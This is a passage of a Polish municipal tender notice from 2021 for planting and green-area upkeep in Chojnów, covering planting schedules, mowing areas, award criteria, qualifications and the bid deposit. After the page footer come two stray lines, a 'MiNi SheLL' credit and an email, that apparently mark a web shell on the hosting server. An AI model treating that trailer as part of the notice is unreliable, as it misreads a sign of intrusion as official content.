kwiatów. Donice zlokalizowane są przy następujących ulicach: ul. Kolejowa – 7 szt., ul. Reja – 6 szt., plac Zamkowy– 3 szt. 2) do dnia 30 maja 2021r. należy posadzić w każdej donicy o pow. 1,00m ² rośliny z gatunku: bluszcz Hedera helix – 5 szt., pelargonia czerwona typu Pelargonium zonale – 15 szt. 3) do dnia 30 maja 2021r. w 6 donicach o pow. 0,8m² ( łącznie 4,8m²), zlokalizowanych przy ul. Reja należy posadzić w każdej donicy:- aksamitkę rozpierzchłą Carmen – brązowa – 3 szt.- aksamitkę wzniesioną złotożółtą – 12 szt.4) do dnia 15 października 2021r. w każdej donicy o pow. 1,00 m² i pow. 0,8 m² należy posadzić chryzantemy - 5 szt. w każdej donicy3. Posadzenie kwiatów z materiału własnego, w 8 kolumnach kwiatowych pelargonii zwisającej (bluszczolistnej ) w kolorze czerwonym i różowym - łączna ilość kwiatów: 1.266 szt. W kolumnach h = 2.400 należy posadzić 168 sztuk kwiatów, w kolumnie h = 1.200 należy posadzić 90 sztuk kwiatów. 4. Posadzenie kwiatów z materiału własnego w skrzynkach szt. 22, łączna ilość kwiatów pelargonii zwisającej (bluszczolistnej ) w kolorze czerwonym i różowym – 88 szt. 5. Posadzenie kwiatów z materiału własnego pelargonii zwisającej (bluszczolistnej ) w kolorze czerwonym i różowym - w donicach szt. 360 po 5 szt. pelargonii w każdej donicy, tj. łącznie 1.800 kwiatów. 6. Kolumny, donice i skrzynki należy przechować do czasu ukorzenienia się i rozkwitu kwiatów oraz przyrostu roślin do długości 25 – 30 cm.7. do dnia 30 maja 2021r. kolumny i donice należy dostarczyć do miejsc zamontowania na terenie miasta Chojnowa oraz na słupach oświetlenia ulicznego w Chojnowie. Skrzynki Wykonawca ma dostarczyć do Urzędu Miejskiego w Chojnowie, pl. Zamkowy 1, w terminie do dnia 30 maja 2021r. 8. Zagospodarowanie klombów z różami przy ul. Paderewskiego przez: 1)	Usunięcie krzewów róż z dwóch klombów oraz dokonanie nowych nasadzeń krzewów z gatunku Ognika szkarłatnego (Pyracantha coccinea) naprzemiennie o czerwonych oraz pomarańczowych owocach wraz z odpowiednim przygotowaniem gleby pod nasadzenia – w ilości 2 x po 15 sztuk roślin w dwóch rzędach o długości po 5 m każdy, tj. łącznie 30 sztuk roślin, nasadzonych w dwóch rzędach na każdym z klombów.2)	Ułożenie agrowłókniny w kolorze czarnym o gramaturze 80 g/m2 mającej zastosowanie do ściółkowania gleby, wyposażonej w stabilizator UV, z przymocowaniem jej do podłoża oraz wysypaniem materiału dekoracyjnego (żwir 8-16 mm ).3)	W przypadku wilgotnego lata dokonanie profilaktycznego oprysku roślin grzybobójczymi środkami ochrony roślin.4)	Zabezpieczenie roślin na zimę, w okresie późnej jesieni (nawodnienie przed zimą, okrycie, itp.)5)	Odkrycie krzewów na wiosnę- tak aby nie dopuścić do zaparzania się krzewów. 9. Rośliny do nasadzeń na rabatach w gazonach muszą być zdrowe, bez znamion chorobowych oraz dobrze wybarwione.10. Po wykonaniu nasadzeń na klombach i w gazonach Wykonawca zobowiązany jest do pielęgnacji nasadzonych roślin, tj. do ich podlewania przez kolejne 14 dni.11. Zamawiający zastrzega, że sadzonki które nie przyjęły się w nowych warunkach w terminie 14 dni od dnia nasadzenia i zgłoszenia Zamawiającemu Wykonawca uzupełni niezwłocznie na własny koszt, bez dodatkowej zapłaty.12. Zaprawa dołków sadzeniowych do sadzenia kwiatów ( na rabatach, w gazonach, skrzynkach, kolumnach kwiatowych i donicach ), w tym zastosowania nawozów mineralnych wolnouwalniajacych, należy do Wykonawcy. Gleba powinna być bogata w składniki wspomagające wzrost roślin. 13. Po pierwszych przymrozkach Wykonawca zobowiązany jest uprzątnąć : - donice i kolumny kwiatowe, tj. opróżnić je i złożyć w miejscu wskazanym przez Zamawiającego,- opróżnić donice ( gazony) z przemarzniętych roślin ( chryzantem).Uzyskaną masę biodegradowalną należy przekazać do kompostowni. Nie należy dopuszczać do zalegania obumarłych roślin w donicach. 14. W celu składowania odpadów ulegających biodegradacji Wykonawca zobowiązany jest do podpisania umowy z kompostownią. W przypadku posiadania własnej kompostowni Wykonawca może składować powyższe odpady we własnym zakresie. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">77310000-6 - Usługi sadzenia roślin oraz utrzymania terenów zielonych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">77314100-5 - Usługi w zakresie trawników</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2021-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamówienia zostanie udzielone Wykonawcy, który uzyska największą liczbę punktów, po zsumowaniu ocen w poszczególnych kryteriach oceny ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin zapłaty</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.8.) Sposób oceny ofert: </h3> Zamówienia zostanie udzielone Wykonawcy, który uzyska największą liczbę punktów, po zsumowaniu ocen w poszczególnych kryteriach oceny ofert. <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część III zamówienia – Sadzenie roślin i utrzymanie terenów zielonych w Rynku, przy ul. Ściegiennego oraz przy ulicy Kilińskiego (Morskie Oko) oraz w Parku Śródmiejskim w Chojnowie w terminie do 30.11.2021 r. zgodnie z wykazem prac.Oznaczenie na mapie: A- Park Śródmiejski, B-Morskie Oko, C-RynekI.	Sadzenie kwiatów kwitnących z materiału własnego:1.	Na rabatach kwiatowych szt. 4 w rejonie fontanny przy „Tkaczu” oraz rondo szt.1 należy posadzić w terminie do 31.05.2021 r.:1)	niecierpek - 980 szt.2)	aksamitkę drobnokwiatową kremową - 960 szt.2.	W donicach wzdłuż chodnika - 10 szt., należy posadzić:1)	po 4 szt. niecierpka odpornego na niekorzystne warunki atmosferyczne, łącznie 40 szt.2)	Po 2 szt. wilec (Ipomoea) w kolorze purpurowym posadzone po 1 na brzegach skrzyni, łącznie 20 szt.3.	W gazonie „murek”, Rynek 1 - ul. Ściegiennego należy posadzić:1)	niecierpka – 375 szt. Wysokość sadzonych roślin nie może być mniejsza niż 15 cm.4.	Wykonawca zobowiązany jest podlewać co drugi dzień wszystkie donice, „murek” w Rynku.5.	Wykonawca zobowiązany jest do wykonywania cięć pielęgnacyjnych krzewów (Berberysów, Tawuły, Krzewuszki, Trzmieliny itd.)6.	Na trzech rabatach w Parku Śródmiejskim należy posadzić w terminie do 31.05.2021 r.:1)	niecierpka - 600 szt.2)	starca popielnego - 350 sztII.	Bieżąca pielęgnacja roślin na rabatach, terenach zieleni, w donicach, w gazonach na „Morskim Oku”, w Parku Śródmiejskim i Rynku:1.	Pielęgnacja roślin istniejących:1)	trawę rabatową wczesną wiosną należy przyciąć, na zimę natomiast zostawiać roślinę bez przycięcia,2)	róże oraz lawendy na okres zimowy należy kopczykować lub przykryć stroiszem. Wczesną wiosną należy usunąć stare, uszkodzone i zdziczałe pędy,2.	Pielęgnacja roślin:1)	rośliny na rabatach należy regularnie pielić, usuwać obumarłe kwiatostany oraz nawozić,2)	rośliny należy na bieżąco podlewać i w razie potrzeby zasilać dodatkowymi dawkami wody i nawozów,3)	wymieniać obumarłe rośliny lub uzupełniać luki w rabatach.III.	Przygotowanie do sezonu zimowego rabat kwiatów jednorocznych, donic oraz gazonu „murek”. 1.	Zabezpieczenie wrażliwych roślin na zimę naturalnym materiałem np. stroiszem, liśćmi, poprzez kopczykowanie, itp.2.	Należy przygotować podłoże na rabatach w donicach i gazonach, w tym celu Wykonawca przeznaczy 3000 l substratu torfowego.3.	Dla wyrównania nawierzchni należy przekopać i uzupełnić ziemię na rabatach. 4.	Na przygotowanie podłoża na rabatach, w donicach i gazonach oraz na bieżącą pielęgnację roślin w okresie wegetacji należy przeznaczyć 15 kg nawozu kwiatowego.IV.	Pielęgnacja terenów „Morskiego Oka”1.	Raz w tygodniu, na terenie Morskiego Oka należy przegrabić i oczyścić plażę (także z chwastów), przegrabić alejki ziemne oraz pozamiatać ciągi pieszo-jezdne (w razie potrzeby częściej)2.	Dwa razy w tygodniu (w razie potrzeby częściej) należy wysprzątać całą zagospodarowaną powierzchnię Morskiego Oka. Należy również wyzbierać i wywieźć nieczystości z terenów zielonych oraz opróżnić kosze zlokalizowane na terenach zielonych. Nie dopuszcza się zalegania śmieci na terenach zieleni oraz w koszach na śmieci .3.	Należy kosić teren Morskiego Oka oraz skarpy oczka wodnego. Wysokość trawy nie może przekraczać 10 cm. 4.	Zgrabienie skoszonej trawy wraz z jej wywiezieniem do kompostowni, nastąpić musi bezpośrednio po koszeniu. Nie dopuszcza się zalegania skoszonej trawy do dnia następnego. Wykonawca zachowa szczególną ostrożność przy koszeniu aby nie uszkodzić mienia osób trzecich np. samochodów, elementów małej architektury, itp. Za wszelkie uszkodzenia odpowiada Wykonawca. 5.	Wykonawca zobowiązany jest do bieżącego usuwania chwastów z nawierzchni mineralnej na „Morskim Oku”V.	Bieżące grabienie trawników (z gałęzi, śmieci i liści)1.	Grabienie trawników z gałęzi, śmieci i liści na wskazanych niżej terenach zielonych w terminie do 30.11.2021 r. zgodnie z wykazem prac:Nr terenu zielonego:27) ul. Kilińskiego - Sikorskiego (obok Hydroforni) - 600 m244) ul. Sikorskiego – skarpa -	379 m246) ul. Sikorskiego 1-7,6, 10, 12,żłobek (pasy przydrożne) -	1 952 m247) ul. Sikorskiego – wjazd na stację paliw -	919 m254) ul. Sikorskiego – skarpa przy poczcie -	297 m257) ul. Sikorskiego - przy Biedronce -	333 m2	Razem - 4 272 m22.	Zakres prac obejmuje również:1)	W przypadku zgrabienia liści kasztanowca – ich zniszczenie. 2)	Grabienie trawników jesienią (z wszystkich opadłych liści).3)	Zbieranie i wywożenie nieczystości z terenów zielonych, opróżnianie koszy ulicznych zlokalizowanych na terenach zielonych oraz wywóz odpadów na składowisko.4)	Czyszczenie z trawy obrzeży chodników, ulic oraz placów zlokalizowanych bezpośrednio przy terenach zielonych.5)	Wygrabianie alejek ziemnych. VI.	Koszenie trawników 1.	Koszenie trawników znajdujących się na terenie Miasta Chojnowa w terminie do 30.11.2021 r. zgodnie z wykazem prac:Nr terenu zielonego: 27) ul. Kilińskiego - Sikorskiego (obok Hydroforni) - 600 m244) ul. Sikorskiego – skarpa -	379 m246) ul. Sikorskiego 1-7,6, 10, 12,żłobek (pasy przydrożne) -	1 952 m247) ul. Sikorskiego – wjazd na stację paliw -	919 m254) ul. Sikorskiego – skarpa przy poczcie -	297 m257) ul. Sikorskiego - przy Biedronce -	333 m2	Razem - 4 272 m22.	Wysokość trawy nie może przekraczać:1)	10 cm w poz. 54), 57)2)	20 cm w poz. 27), 44), 46), 47)3.	Zgrabienie skoszonej trawy wraz z jej wywiezieniem do kompostowni, nastąpić musi bezpośrednio po koszeniu. Nie dopuszcza się zalegania skoszonej trawy do dnia następnego. 4.	Wykonawca zachowa szczególną ostrożność przy koszeniu aby nie uszkodzić mienia osób trzecich np. samochodów, elementów małej architektury, itp. Za wszelkie uszkodzenia odpowiada Wykonawca. 5.	Posprzątanie alejek, chodników itp. znajdujących się bezpośrednio przy trawnikach ze świeżo skoszonej trawy.6.	Oprócz bieżącego grabienia Wykonawca w dniu 30.11.2021 r. zgrabi i wywiezienie liście z terenów objętych pielęgnacją. 7.	Wypłacenie ostatniej faktury będzie możliwe po protokolarnym odbiorze prawidłowo wykonanych prac, tj. w dniu odbioru tereny zieleni muszą być m.in. wykoszone, pograbione, pozamiatane i posprzątane z zalegających liści, śmieci, itp.Przebieg rabat kwiatowych w rejonie fontanny przy „Tkaczu” przedstawia Załącznik nr 2B do umowy.Wskazanie terenów do koszenia i grabienia zawiera Załącznik nr 2C do umowy.Uwagi:1. Zgoda na usunięcie drzewa/krzewu może być wydana wyłącznie przez Wydział Gospodarki Gruntami i Ochrony Środowiska Urzędu Miejskiego w Chojnowie.2. Przed złożeniem oferty proponuje się Wykonawcom przeprowadzenie wizji w terenie.3. W kolumnach, skrzynkach oraz doniczkach należy zastosować ziemię ogrodniczą ( substrat torfowy) .4. Wykonawca zobowiązany jest do zagospodarowania odpadów zgodnie z obowiązującymi przepisami. 5. Za wszelkie uszkodzenia odpowiedzialność ponosi Wykonawca. O uszkodzeniach Wykonawca powinien informować Inwestora niezwłocznie. 6. Wykonawca poinformuje o wszystkich utrudnieniach w realizacji zadania.7. Koszty materiałów, sprzętu potrzebnego do realizacji zadania ponosi Wykonawca robót. 8. Zamawiający zastrzega sobie prawo do przeprowadzania wyrywkowych kontroli terenów zieleni w zakresie realizowania prac przez Wykonawcę zgodnie z umową. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">77310000-6 - Usługi sadzenia roślin oraz utrzymania terenów zielonych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">77314100-5 - Usługi w zakresie trawników</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2021-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamówienia zostanie udzielone Wykonawcy, który uzyska największą liczbę punktów, po zsumowaniu ocen w poszczególnych kryteriach oceny ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin zapłaty</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.8.) Sposób oceny ofert: </h3> Zamówienia zostanie udzielone Wykonawcy, który uzyska największą liczbę punktów, po zsumowaniu ocen w poszczególnych kryteriach oceny ofert. <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia może ubiegać się Wykonawca, który spełnia następujące warunki dotyczące:1)	zdolności do występowania w obrocie gospodarczym:- nie dotyczy.2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:	- nie dotyczy.3)	sytuacji ekonomicznej lub finansowej:-nie dotyczy.a)	zdolności technicznej lub zawodowej Wykonawcy: Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że wykonał należycie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 usługę polegającą na utrzymaniu terenów zielonych w sposób ciągły przez okres co najmniej 7 m-cy. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Na wezwanie Zamawiającego, Wykonawca zobowiązany jest do złożenia następujących oświadczeń lub dokumentów:1. odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji; (UWAGA: Dokument należy złożyć na wezwanie. Nie składa się go wraz z ofertą).2. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa pkt. 5ppkt 2 lit. a – składa dokument lub dokumenty wystawione w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:- nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury.3. Dokumenty, o których mowa w pkt. 2 powinny być wystawione nie wcześniej niż 3 miesiące przed ich złożeniem.4. Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt.2, zastępuje się je odpowiednio w całości lub w części dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub, jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania Wykonawcy. Przepis pkt. 3 stosuje się.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Na wezwanie Zamawiającego, Wykonawca zobowiązany jest do złożenia następujących oświadczeń lub dokumentów:1)	W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu: a)	wykazu usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest wstanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy. (UWAGA: Wykaz należy złożyć na wezwanie. Nie składa się go wraz z ofertą).</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1)	Oświadczenia wymagane postanowieniami rozdz. VII pkt. 1 SWZ;2)	Oświadczenia podmiotów udostępniających zasoby, wymagane postanowieniami rozdz. VIII pkt 5 SWZ;3)	Zobowiązania wymagane postanowieniami rozdz. VIII pkt. 3 SWZ, w przypadku gdy Wykonawca polega na zdolnościach podmiotów udostępniających zasoby w celu potwierdzenia spełniania warunków udziału w postępowaniu;4)	Oświadczenie, o którym mowa w rozdziale IX pkt 4 SWZ;5)	Odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru (jeżeli dotyczy) - w celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania;6)	Pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy, o ile prawo do podpisania oferty nie wynika z innych dokumentów złożonych wraz z ofertą. Treść pełnomocnictwa musi jednoznacznie określać czynności, co do wykonywania których pełnomocnik jest upoważniony;7)	Pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego – w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia;8)	Oryginał gwarancji lub poręczenia, jeśli wadium wnoszone jest w innej formie niż pieniądz. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Zamawiający żąda wniesienia wadium: - na część I zamówienia w wysokości – 1 300,00 zł - na część II zamówienia w wysokości – 800,00 zł- na część III zamówienia w wysokości – 1 000,00 zł2.	Zgodnie z art. 97 ust. 7 ustawy wadium może być wnoszone według wyboru Wykonawcy w jednej lub kilku następujących formach:1)	pieniądzu;2)	gwarancjach bankowych;3)	gwarancjach ubezpieczeniowych;4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2019 r. poz. 310, 836 i 1572).3.	Wadium w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego 13 8644 0000 0000 2121 2000 0130 tytułem: „Utrzymanie terenów zielonych w roku 2021”.4.	Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.5.	Jeżeli wadium wnoszone jest w formie gwarancji lub poręczenia Wykonawca przekazuje Zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej.6.	W przypadku wniesienia wadium w formie gwarancji lub poręczenia z jej treści musi jednoznacznie wynikać, jaki jest sposób reprezentacji. Dokument musi być podpisany przez upoważnionego (upełnomocnionego) przedstawiciela. Z treści dokumentu winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 98 ust. 6 ustawy.7.	Dokument, o którym mowa w pkt. 5 ma być sporządzony zgodnie z obowiązującym prawem i winien zawierać następujące elementy: nazwę Wykonawcy, beneficjenta (Zamawiającego), gwaranta lub poręczyciela oraz wskazanie ich siedzib, oznaczenie postępowania, określenie (nazwa) przedmiotu postępowania, określenie wierzytelności, która ma być zabezpieczona gwarancją, kwotę gwarancji, termin ważności dokumentu.8.	Jeżeli wadium zostało wniesione w pieniądzu, Zamawiający zwróci je wrazz odsetkami wynikającymi z rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę. 9.	Zamawiający zatrzymuje wadium wraz z odsetkami.10.	Wadium należy wnieść przed upływem terminu składania ofert. Wadium wniesione w pieniądzu przelewem na wskazany rachunek bankowy musi wpłynąć najpóźniej przed terminem składania ofert. Ze względu na ryzyko związane z czasem trwania okresu rozliczeń międzybankowych Zamawiający zaleca dokonanie przelewu ze stosownym wyprzedzeniem.11.	Zamawiający zwraca wadium w trybie i terminach określonych w art. 98 ustawy. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, wtedy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo musi być dołączone do oferty. 2.	W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenie, o którym mowa w rozdz. VII pkt 1 SWZ, składa każdy z wykonawców. 3.	W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane.4.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy. (NALEŻY WYPEŁNIĆ PKT. 14 W FORMULARZU OFERTY).5.	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców są oni zobowiązani na wezwanie Zamawiającego złożyć dokumenty i oświadczenia, o których mowa w rozdz. VII pkt 5 SWZ, przy czym:1) dokumenty i oświadczenia, o których mowa w rozdz. VII pkt. 5 ppkt 1) SWZ składa odpowiednio Wykonawca, który wykazuje spełnianie warunku, w zakresie i na zasadach opisanych w rozdz. V pkt. 1 SWZ. 2) dokumenty i oświadczenia, o których mowa w rozdz. VII pkt. 5 ppkt 2) SWZ składa każdy z nich. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość dokonania zmian zawartej umowy w przypadku wystąpienia okoliczności związanych z COVID-19 lub innej epidemii mających wpływ na należyte wykonanie umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-04-12 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP i udostępnionego również na miniPortalu https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-04-12 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-05-11</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-04-02 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com